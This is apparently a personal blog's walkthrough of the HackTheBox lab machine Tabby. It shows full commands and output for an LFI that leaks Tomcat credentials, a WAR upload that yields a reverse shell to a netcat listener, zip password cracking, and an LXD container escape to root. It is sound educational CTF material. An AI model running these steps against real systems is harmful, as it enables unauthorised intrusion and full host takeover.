TABBY HACKTHEBOX WRITEUP

NMAP SCANS

    Starting Nmap 7.80 ( https://nmap.org ) at 2020-06-21 22:45 IST
    NSE: Loaded 151 scripts for scanning.
    NSE: Script Pre-scanning.
    Initiating NSE at 22:45
    Completed NSE at 22:45, 0.00s elapsed
    Initiating NSE at 22:45
    Completed NSE at 22:45, 0.00s elapsed
    Initiating NSE at 22:45
    Completed NSE at 22:45, 0.00s elapsed
    Initiating Ping Scan at 22:45
    Scanning 10.10.10.194 [4 ports]
    Completed Ping Scan at 22:45, 0.56s elapsed (1 total hosts)
    Initiating SYN Stealth Scan at 22:45
    Scanning tabby.htb (10.10.10.194) [1000 ports]
    Discovered open port 22/tcp on 10.10.10.194
    Discovered open port 80/tcp on 10.10.10.194
    Discovered open port 8080/tcp on 10.10.10.194
    Completed SYN Stealth Scan at 22:45, 2.73s elapsed (1000 total ports)
    Initiating Service scan at 22:45
    Scanning 3 services on tabby.htb (10.10.10.194)
    Completed Service scan at 22:45, 7.34s elapsed (3 services on 1 host)
    Initiating OS detection (try #1) against tabby.htb (10.10.10.194)
    Retrying OS detection (try #2) against tabby.htb (10.10.10.194)
    Initiating Traceroute at 22:45
    Completed Traceroute at 22:45, 6.34s elapsed
    NSE: Script scanning 10.10.10.194.
    Initiating NSE at 22:45
    Completed NSE at 22:45, 8.54s elapsed
    Initiating NSE at 22:45
    Completed NSE at 22:46, 2.00s elapsed
    Initiating NSE at 22:46
    Completed NSE at 22:46, 0.00s elapsed
    Nmap scan report for tabby.htb (10.10.10.194)
    Host is up (0.42s latency).
    Not shown: 802 closed ports, 195 filtered ports
    PORT     STATE SERVICE VERSION
    22/tcp   open  ssh     OpenSSH 8.2p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
    80/tcp   open  http    Apache httpd 2.4.41 ((Ubuntu))
    |_http-favicon: Unknown favicon MD5: 338ABBB5EA8D80B9869555ECA253D49D
    | http-methods: 
    |_  Supported Methods: GET HEAD POST OPTIONS
    |_http-title: Mega Hosting
    8080/tcp open  http    Apache Tomcat
    | http-methods: 
    |_  Supported Methods: OPTIONS GET HEAD POST
    |_http-open-proxy: Proxy might be redirecting requests
    |_http-title: Apache Tomcat
    Aggressive OS guesses: Linux 2.6.32 (95%), Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (94%), ASUS RT-N56U WAP (Linux 3.4) (93%), Linux 3.16 (93%), Linux 2.6.39 - 3.2 (92%), Linux 3.1 - 3.2 (92%), Linux 3.2 - 4.9 (92%), Linux 3.7 - 3.10 (92%)
    No exact OS matches for host (test conditions non-ideal).
    Network Distance: 21 hops
    Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

    TRACEROUTE (using port 995/tcp)
    HOP RTT       ADDRESS
    1   ... 20
    21  284.13 ms tabby.htb (10.10.10.194)

    NSE: Script Post-scanning.
    Initiating NSE at 22:46
    Completed NSE at 22:46, 0.00s elapsed
    Initiating NSE at 22:46
    Completed NSE at 22:46, 0.00s elapsed
    Initiating NSE at 22:46
    Completed NSE at 22:46, 0.00s elapsed
    Read data files from: /usr/bin/../share/nmap
    OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
    Nmap done: 1 IP address (1 host up) scanned in 34.56 seconds
            Raw packets sent: 1560 (72.546KB) | Rcvd: 837 (34.270KB)

WEBSITE ENUMEARTION

PORT 80

PORT 8080

running tomcate which need username password for manager but we didnt have one!!

So lets go for port 80 MEGA HOSTING part

After searching for its exploit I didnot get the actuall exploit but got idea that it has LFI

So here in news part it contains LFI

SO after trying log exploitation I got to know that we cannot have RCE

GETTING PASSWORDS FOR TOMCAT WEBSITE

Here we see that we have LFI from where we can get tomcat password!!

So here first we need to understand its directory structure

https://askubuntu.com/questions/135824/what-is-the-tomcat-installation-directory

https://mkyong.com/tomcat/tomcat-default-administrator-password/#:~:text=1.,access%20the%20Tomcat%20manager%20page.

I recommend you to download tomcat to check its file structure

SO after going through that directory I got password for tomcat

So lets get our shell

which was not that easy as i have to google and took help from forums!!

because their is no upload area so we have to upload using curl and wget!!

So please do one thing Do read Documentaion of Apache Tomcat9 upload application part

curl -v -u tomcat:****************** -T test.war ‘http://10.10.10.194:8080/manager/text/deploy?path=/test&update=true’

Then we can access it using

http://tabby.htb:8080/manager/text/list

http://tabby.htb:8080/manager/text/start?path=/test.test

http://tabby.htb:8080/test.test

    ┌─[root@liquid]─[~/Desktop/HTB/tabby]
    └──╼ #nc -lnvp 9001
    listening on [any] 9001 ...
    connect to [10.10.14.12] from (UNKNOWN) [10.10.10.194] 40170
    python3 -c 'import pty;pty.spawn("/bin/bash")'
    tomcat@tabby:/var/lib/tomcat9$

GETTING USER ACCESS

lets Download linpeas to our shell

After downloading it and running it in tmp directory we got a archive which is owned by ash which looks interesting

So lets get that to our local machine

    ┌─[root@liquid]─[~/Desktop/HTB/tabby]
    └──╼ #ls
    16162020_backup.zip  liquid.war

So to unzip it we need password so lets crack it using fcrackzip

    ┌─[root@liquid]─[~/Desktop/HTB/tabby]
    └──╼ #fcrackzip -D -p ../../THM/Wordlists/rockyou.txt 16162020_backup.zip 
    possible pw found: ******** ()

So after enumerating through files i got nothing so i used this password to SU ASH

Here we go with our user ash

ash@tabby:~$ id
    uid=1000(ash) gid=1000(ash) groups=1000(ash),4(adm),24(cdrom),30(dip),46(plugdev),116(lxd)

GETTING ROOT ACCESS

So here we go with our usual command

    ash@tabby:~$ id
    uid=1000(ash) gid=1000(ash) groups=1000(ash),4(adm),24(cdrom),30(dip),46(plugdev),116(lxd)
    ash@tabby:~$ sudo -l
    sudo: unable to open /run/sudo/ts/ash: Read-only file system
    [sudo] password for ash: 
    Sorry, user ash may not run sudo on tabby.
    ash@tabby:~$ 

but the thing is that LXD looks suspicious

So lets google it

Here we know that we could privesc using this

https://www.hackingarticles.in/lxd-privilege-escalation/

https://book.hacktricks.xyz/linux-unix/privilege-escalation/lxd-privilege-escalation

So just follow all these steps

But one thing which took me 3 hrs to find my mistake is do this from ash directory not from tmp

As it was not working for me from tmp So i tried for ash ones

FROM YOUR MACHINE

    ┌─[root@liquid]─[~/Desktop/HTB/tabby/lxd-alpine-builder]
    └──╼ #ls -l
    total 3180
    -rw-r--r-- 1 root root 3212312 Jun 21 22:04 alpine-v3.12-x86_64-20200621_2204.tar.gz
    -rwxr-xr-x 1 root root    7498 Jun 21 22:03 build-alpine
    -rw-r--r-- 1 root root   26530 Jun 21 22:03 LICENSE
    -rw-r--r-- 1 root root     768 Jun 21 22:03 README.md
    ┌─[✗]─[root@liquid]─[~/Desktop/HTB/tabby/lxd-alpine-builder]
    └──╼ #python -m SimpleHTTPServer 
    Serving HTTP on 0.0.0.0 port 8000 ...

FROM ASH’S MACHINE

    ash@tabby:~$ wget http://10.10.14.12:8000/alpine-v3.12-x86_64-20200621_2204.tar.gz
    <14.12:8000/alpine-v3.12-x86_64-20200621_2204.tar.gz
    --2020-06-21 17:20:54--  http://10.10.14.12:8000/alpine-v3.12-x86_64-20200621_2204.tar.gz
    Connecting to 10.10.14.12:8000... connected.
    HTTP request sent, awaiting response... 200 OK
    Length: 3212312 (3.1M) [application/gzip]
    Saving to: ‘alpine-v3.12-x86_64-20200621_2204.tar.gz’

    alpine-v3.12-x86_64 100%[===================>]   3.06M  67.4KB/s    in 45s     

    2020-06-21 17:21:39 (70.2 KB/s) - ‘alpine-v3.12-x86_64-20200621_2204.tar.gz’ saved [3212312/3212312]

    ash@tabby:~$ lxc image import ./alpine-v3.12-x86_64-20200621_2204.tar.gz --alias liquid
    <ne-v3.12-x86_64-20200621_2204.tar.gz --alias liquid
    If this is your first time running LXD on this machine, you should also run: lxd init
    To start your first instance, try: lxc launch ubuntu:18.04

    ash@tabby:~$ lxc image list
    lxc image list
    +--------+--------------+--------+-------------------------------+--------------+-----------+--------+------------------------------+
    | ALIAS  | FINGERPRINT  | PUBLIC |          DESCRIPTION          | ARCHITECTURE |   TYPE    |  SIZE  |         UPLOAD DATE          |
    +--------+--------------+--------+-------------------------------+--------------+-----------+--------+------------------------------+
    | liquid | 1145f55bb6a7 | no     | alpine v3.12 (20200621_22:04) | x86_64       | CONTAINER | 3.06MB | Jun 21, 2020 at 5:21pm (UTC) |
    +--------+--------------+--------+-------------------------------+--------------+-----------+--------+------------------------------+

Here you may encounter with this error

Error: No storage pool found. Please create a new storage pool

https://techoverflow.net/2018/05/03/how-to-fix-lxd-failed-container-creation-no-storage-pool-found-please-create-a-new-storage-pool/

    ash@tabby:~$ lxd init
    Would you like to use LXD clustering? (yes/no) [default=no]: no
    Do you want to configure a new storage pool? (yes/no) [default=yes]: no
    Would you like to connect to a MAAS server? (yes/no) [default=no]: ^C
    ash@tabby:~$ lxd init
    Would you like to use LXD clustering? (yes/no) [default=no]: no
    Do you want to configure a new storage pool? (yes/no) [default=yes]: yes
    Name of the new storage pool [default=default]: 
    Name of the storage backend to use (dir, lvm, ceph, btrfs) [default=btrfs]: dir
    Would you like to connect to a MAAS server? (yes/no) [default=no]: no
    Would you like to create a new local network bridge? (yes/no) [default=yes]: 
    What should the new bridge be called? [default=lxdbr0]: 
    The requested network bridge "lxdbr0" already exists. Please choose another name.
    What should the new bridge be called? [default=lxdbr0]: 
    The requested network bridge "lxdbr0" already exists. Please choose another name.
    What should the new bridge be called? [default=lxdbr0]: liquid
    What IPv4 address should be used? (CIDR subnet notation, “auto” or “none”) [default=auto]: 
    What IPv6 address should be used? (CIDR subnet notation, “auto” or “none”) [default=auto]: 
    Would you like LXD to be available over the network? (yes/no) [default=no]: 
    Would you like stale cached images to be updated automatically? (yes/no) [default=yes] 
    Would you like a YAML "lxd init" preseed to be printed? (yes/no) [default=no]: 

THEN JUST GO FURTHER WITH YOUR COMMANDS :

   ash@tabby:~$ lxc init liquid privesc -c security.privileged=true
    Creating privesc
    ash@tabby:~$ lxc config device add privesc mydevice disk source=/ path=/mnt/root recursive=true
    Device mydevice added to privesc
    ash@tabby:~$ ^C
    ash@tabby:~$ lxc start privesc
    ash@tabby:~$ lxc exec privesc /bin/sh
    ~ # id
    uid=0(root) gid=0(root)
    ~ # cd /mnt/root
    /mnt/root # ls
    bin         home        lost+found  root        swap.img
    boot        lib         media       run         sys
    cdrom       lib32       mnt         sbin        tmp
    dev         lib64       opt         snap        usr
    etc         libx32      proc        srv         var
    /mnt/root # cd root
    /mnt/root/root # wc -c root.txt
    33 root.txt

HOPE YOU LOVE THIS WALKTHROUGH BY LIQUIDRAGE

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s

WordPress.com.

Up ↑

%d bloggers like this: